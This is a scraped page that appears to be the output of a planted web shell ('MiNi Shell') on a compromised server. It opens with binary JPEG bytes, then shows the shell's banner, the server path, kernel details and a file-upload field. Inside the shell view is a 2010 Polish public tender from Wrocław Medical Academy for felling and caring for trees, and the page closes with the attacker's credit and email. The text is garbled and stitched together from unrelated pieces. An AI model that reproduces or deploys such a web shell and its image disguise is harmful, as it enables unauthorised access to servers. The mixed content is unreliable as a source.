JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100118/13986-N-2010.html

<p class="kh_header"><b>Wrocław: Prace pielęgnacyjno- sanitarne i wycinkowe drzewostanu rosnącego w obrębie :
1.	Zespołu Kliniczno- Dydaktycznego  Akademii Medycznej położonego w rejonie    ul. Kochanowskiego10, ul. Bartla 5, Wyspy Tamka 1 we Wrocławiu.
2.	Wycinka drzew rosnących w obrębie Zespołu Kliniczno - Dydaktycznego Akademii Medycznej położonego w rejonie ul. Marcinkowskiego 2/6                 i ul. Mikulicza - Radeckiego 4, 5 we Wrocławiu</b><br>
<b>Numer ogłoszenia: 13986 - 2010; data zamieszczenia: 18.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Medyczna im. Piastów Śląskich , ul. Pasteura 1, 50-537 Wrocław, woj. dolnośląskie, tel. (071) 784 00 44; 784-11-73, faks (071) 784 00 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prace pielęgnacyjno- sanitarne i wycinkowe drzewostanu rosnącego w obrębie :
1.	Zespołu Kliniczno- Dydaktycznego  Akademii Medycznej położonego w rejonie    ul. Kochanowskiego10, ul. Bartla 5, Wyspy Tamka 1 we Wrocławiu.
2.	Wycinka drzew rosnących w obrębie Zespołu Kliniczno - Dydaktycznego Akademii Medycznej położonego w rejonie ul. Marcinkowskiego 2/6                 i ul. Mikulicza - Radeckiego 4, 5 we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Prace pielęgnacyjno- sanitarne i wycinkowe drzewostanu rosnącego w  obrębie :
 A) Zespołu Kliniczno- Dydaktycznego położonego w rejonie                            ul. Kochanowskiego10, ul. Bartla 5, Wyspy Tamka 1 we Wrocławiu.
. Prace pielęgnacyjne drzewostanu obejmują:
-	wycinkę drzew,
-	korekty koron drzew,
-	usunięcie posuszu z koron drzew,
-	rozdrobnienie gałęzi,
-	uporządkowanie terenu
Koszt wykonania usługi powinien obejmować: robociznę, transport, pracę sprzętu (podnośnik koszowy, sprzęt alpinistyczny, piły spalinowe, rozdrabniacz do gałęzi).
Prace winny odbywać się po wcześniejszym uzgodnieniu terminu ze Zleceniodawcą.
Uwaga!
Końcowy koszt realizacji usługi winien być pomniejszony o wartość pozyskanego dla celów opałowych drewna. Przyjmuje się średnią cenę za 1 m3 - 30 zł brutto.

Planowany zakres prac:

WYCINKA DRZEW

ul. Bartla 5
-	świerk pospolity, głóg jednoszyjkowy, klon pospolity),
Prace na terenie posesji winny być wykonana zgodnie z Pozwoleniem Konserwatorskim - Decyzja Nr 446/Z/2009 z dnia 03.07.2009 r. ( załącznik do SIWZ).

Wyspa Tamka 1
-	bez czarny - 4 szt.
-	 klon pospolity - 5 szt.
-	 jesion wyniosły - 2 szt.
-	 klon jesionolistny - 2 szt.
-	 robinia akacjowa - 12 szt.
-	 brzoza brodawkowata
-	 grab pospolity)
Prace winny być wykonane zgodnie z Pozwoleniem Konserwatorskim - Decyzja Nr 734/Z/2009 z dnia 13.10.2009 r. ( załącznik do SIWZ)

 ul. Kochanowskiego 10 (prace wysokościowe wykonywane wyłącznie przy użyciu sprzętu alpinistycznego)
-	kasztanowiec - usunięcie pnia o wysokości ok. 3 m
-	iglicznia trój cierniowa 

PIELĘGNACJA DRZEWOSTANU

  Ul. Bartla 5
-prace pielęgnacyjne drzewostanu- korekta koron, usunięcie posuszu 
   oraz jemioły  - 6 szt
-	pionowanie drzew - tuja  2 szt
-	prace mające na celu leczenie dębu szypułkowego ( drzewo ma zamurowany otwór w pniu)
           Część prac na terenie posesji winna być wykonana zgodnie z Pozwoleniem  Konserwatorskim - Decyzja Nr 446/Z/2009 z dnia 03.07.2009

   Wyspa Tamka 1
-	prace pielęgnacyjne drzewostanu- korekta koron, usunięcie posuszu i jemioły
       (robinia akacjowa 3szt, dąb szypułkowy, ajlant gruczołkowaty, klon pospolity)
   Prace winny być wykonane zgodnie z Pozwoleniem Konserwatorskim -                        Decyzja Nr 734/Z/2009 z dnia 13.10.2009 r. (załącznik do SIWZ)

  Ul. Kochanowskiego 10
   ( prace wysokościowe wykonane wyłącznie przy użyciu sprzętu alpinistycznego)
-	usunięcie posuszu z drzew ( daglezja zielona  -2 szt. , jesion wyniosły - 2 szt. , 
      klon zwyczajny - 2 szt. , metasekwoja chińska, świerk Kłujacy, wiąz szypułkowy- 3 szt.)
Prace  winny być wykonane w dwóch etapach:
-	wycinka drzew - termin realizacji do dnia 31.01.2010 r
-	pielęgnacja drzewostanu - termin realizacji w okresie od marca do kwietnia 2010 r.
                                                                 *********
        B) Wycinka drzew rosnących w obrębie Zespołu Kliniczno - Dydaktycznego położonego w rejonie ul. Marcinkowskiego 2/6                               i ul. Mikulicza - Radeckiego 4, 5 .  W/w prace obejmują:
.	wycinkę drzew
.	rozdrobnienie gałęzi
.	uporządkowanie terenu ( usunięcie wszystkich pozostałości po wycince )
Koszt wykonania usługi powinien obejmować: robociznę, transport, pracę sprzętu (podnośnik koszowy, sprzęt alpinistyczny, piły spalinowe, rozdrabniacz do gałęzi).
Prace  winny odbywać się po wcześniejszym uzgodnieniu terminu ze Zleceniodawcą.
Końcowy koszt realizacji usługi winien być pomniejszony o wartość pozyskanego dla celów opałowych drewna. Przyjmuje się średnią cenę za 1 m3 - 30 zł brutto.
Wykaz drzew na terenie Akademii Medycznej przy ul. Marcinkowskiego 2/6 
i ul. Mikulicza - Radeckiego 4 i 5 przeznaczonych do wycinki:
- drzewa, których wycinka wymaga zgody urzędu : 
L.p.	Nr inw.	Gatunek	Obwód pnia (cm)
1.	22	klon pospolity	216
2.	23	bożodrzew gruczołkowaty	128
3.	24	wiąz polny	124
4.	27	klon pospolity	244
5.	32	klon pospolity	36
6.	33	klon pospolity	48
7.	37	klon pospolity	79
8.	39	klon pospolity	44
9.	40	klon pospolity	78
10.	41	klon pospolity	69
11.	42	klon pospolity	56
12.	43	wiąz polny	79
13.	45	klon pospolity	50,31,49,31,14
14.	50	klon pospolity	33
15.	51	klon pospolity	30
16.	52	wiąz polny	48
17.	55	kasztanowiec biały	93, 96
18.	56	kasztanowiec biały	109
19.	57	klon pospolity	121, 65
20.	58	kasztanowiec biały	234
21.	Sektor II 51	robina biała 	145
- drzewa poniżej 5 lat, których wycinka nie wymaga zgody urzędu:
L.p.	Nr inw.	Gatunek	Obwód pnia (cm)
1.	28	klon pospolity	13
2.	29	klon pospolity	22
3.	30	klon pospolity	9
4.	31	klon jawor	30
5.	34	bez czarny	15,20,26
6.	35	klon pospolity	25
7.	36	klon pospolity	10
8.	38	bez czarny	12,6,10,10
9.	44	bez czarny	18,15,12
10.	46	klon jesionolistny	8
11.	47	bez czarny	9
12.	48	klon pospolity	14
13.	49	klon pospolity	19
14.	53	klon pospolity	15
15.	54	klon pospolity	15
Warunek:
Ze względu na dużą ilość parkujących samochodów w dniach roboczych, wycinka w/w drzew 
musi być wykonywana w sobotę i niedzielę.

1.	Decyzja Wydziału Ochrony Środowiska i Rolnictwa zezwalająca na wycinkę drzew
Nr WŚR.ZPM/7637/2629-56/09 z 06.04.09r. ( załącznik do SIWZ).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6, 77.21.15.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> .    Ocena spełnienia warunków wymaganych od  Oferentów zostanie dokonana wg formuły 
       spełnia - nie spełnia  po sprawdzeniu czy Oferent :
-	  Nie podlega  wykluczeniu na podstawie art.24 i art. 22  ustawy Prawo zamówień   publicznych,
     -    Posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy   nakładają obowiązek posiadania takich uprawnień. 
-	Posiada niezbędna wiedzę  i doświadczenie  oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
-	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
-	Posiada  aktualną Polisę OC od  prowadzonej działalności gospodarczej
-   wykaże, że wykonał min  3 podobnych zleceń  w ciągu ostatnich 3 lat, 
-   załączy podpisany projekt umowy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> -. Oświadczenie oferenta, że: nie podlega wykluczeniu   z  postępowania na podstawie art. 24 oraz ,  że spełnia wymagania  określone w art. 22    - wzór oświadczenia  - załącznik nr     do SIWZ
-. Aktualny wyciąg z rejestru sądowego firmy lub zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzające, że profil działania oferenta odpowiada   przedmiotowi  zamówienia oraz  zawierający aktualny wykaz osób  uprawnionych do reprezentowania oferenta wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
-  Zaświadczenie,  że oferent nie zalega   z płatnościami w ZUS i US  lub, że uzyskał zgodę na zwolnienie, odroczenie  lub rozłożenie płatności na raty, wystawione nie wcześniej niż  3 miesięcy  przed terminem składania ofert. 
 -   Wykaz zrealizowanych zamówień o podobnym zakresie (min. 3), wykonanych w ciągu ostatnich 3 lat,
- Imienne przedstawienie osób posiadających kwalifikacje - uprawnienia zawodowe w zakresie przedmiotu zamówienia.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.am.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół ds. Zamówień Publicznych Akademii Medycznej we Wrocławiu
przy ul. Mikulicza-Radeckiego 5, pok.221.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2010 godzina 10:00, miejsce: Zespół ds. Zamowień Publicznych Akademii Medycznej we Wrocławiu
orzy ul. Mikulicza-Radeckiego 5, pok.221.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com